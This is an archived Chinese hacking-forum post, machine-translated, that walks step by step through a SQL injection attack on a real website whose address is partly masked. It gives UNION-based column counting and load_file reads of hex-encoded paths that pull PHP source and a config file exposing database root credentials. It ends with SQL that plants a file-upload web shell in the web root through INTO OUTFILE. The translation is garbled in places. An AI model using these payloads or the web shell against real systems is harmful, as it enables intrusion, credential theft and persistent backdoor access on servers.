Simple PHP test-vulnerability warning-the black bar safety net

2009-04-11T00:00:00
ID MYHACK58:62200922871
Type myhack58
Reporter 佚名
Modified 2009-04-11T00:00:00

Description

The test site is as follows

http://www.**. com

Find a stepping on point

http://www.**. com/zhaobiao/zhaobiao_hy_show. php? id=1 4 9 8 3 0

Submit a'

Returns the result

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in

/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 1 3 5

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in

/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 1 4 0

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in

/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 1 5 4

The path came out,continue to the security check.

http://www.**. com/zhaobiao/zhaobiao_hy_show. php? id=1 4 9 8 3 0'and 1=1 #

Returns an error, not a character type.

Specify:%of 2 3 is#

Submit and 1=1 returns to normal

Submit and 1=2 to return to normal

Next is the union statement

and 1=1 union select 1 returns to normal

and 1=1 union select 1,2 return to normal

and 1=1 union select 1,2,3 return to normal

and 1=1 union select 1,2,3,4 return to normal

and 1=1 union select 1,2,3,4,5 return to normal

and 1=1 union select 1,2,3,4,5,6 return to normal

and 1=1 union select 1,2,3,4,5,6,7 returns to normal

and 1=1 union select 1,2,3,4,5,6,7,8 return to normal

and 1=1 union select 1,2,3,4,5,6,7,8,9 return to normal

and 1=1 union select 1,2,3,4,5,6,7,8,9,10 return to normal

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11 return to normal

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12 return to normal

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 return to normal

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 return to normal

Guess 1 4 It is normal to continue to the next step.

Generally such a site is basically the background is not possible so easy for us to find..

Or take a look at have to say it..

Guess the common path.

login.php admin.php admin_login.php admin_index.php admin/login.php admin/admin.php admin/admin_login.php admin/admin_index.php manage/index.php manage/login.php manage/admin_login.php manage/admin_index.php

And so on. Patient can slowly go guess. Even guessed also useless.

We also use the more direct method. The direct use load_file to read the file content

http://www.**. com/zhaobiao/zhaobiao_hy_show. php? id=1 4 9 8 3 0 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14

http://www.**. com/zhaobiao/zhaobiao_hy_show. php? id=1 4 9 8 3 0 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 Inside and 1=1 into and 1=2

Returns the following results:

2

It is in the 2 position of the storm, we need the contents of the file.

We from /var/www/html/zhaobiao/zhaobiao_hy_show.php

Directly with load_fi

le('/var/www/html/zhaobiao/zhaobiao_hy_show.php')

The premise is to put /var/www/html/zhaobiao/zhaobiao_hy_show.php converted into 1 6-ary

http://www.**. com/zhaobiao/zhaobiao_hy_show. php? id=1 4 9 8 3 0 and 1=2 union select 1,load_file

(0x2F7661722F7777772F68746D6C2F7A68616f6269616f2f7a68616f6269616f5f68795f73686f772e706870),3,4,5,6,7,8,9,1 0,1 1,1 2,1 3,1 4

Returns the result

0 or $regdate>mysql_result($query,0,'yxdate')){?& gt;

",mysql_result($query,0,'sm'));?& gt;

Do not pipe these directly view the source files to find a inc.php file and then with the front of the path

/var/www/html/inc.php

http://www.**. com/zhaobiao/zhaobiao_hy_show. php? id=1 4 9 8 3 0 and 1=2 union select 1,load_file

(0x2F7661722F7777772F68746D6C2F696e632e706870),3,4,5,6,7,8,9,1 0,1 1,1 2,1 3,1 4

The storm look to return to see the content directly to view the source file

<? $myconn=mysql_connect('localhost','root','www.**. comy0p5h1i0'); mysql_select_db('mlk'); ?& gt;

Mysql direct storm out..

The next step is to login to Mysql and then insert yourself ready for the pony..

use mlk; create table mmxy (cmd TEXT); insert into mmxy values('<? php'); insert into mmxy values('$msg = copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]) ? "Successful" : "failure";'); insert into mmxy values('echo $msg;'); insert into mmxy values('?& gt;'); insert into mmxy values('<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">'); insert into mmxy values('<input NAME="MyFile" TYPE="file">'); insert into mmxy values('<input VALUE="Up" TYPE="submit"></form>'); select * from mmxy into outfile '/var/www/html/zhaobiao/mmxy.php';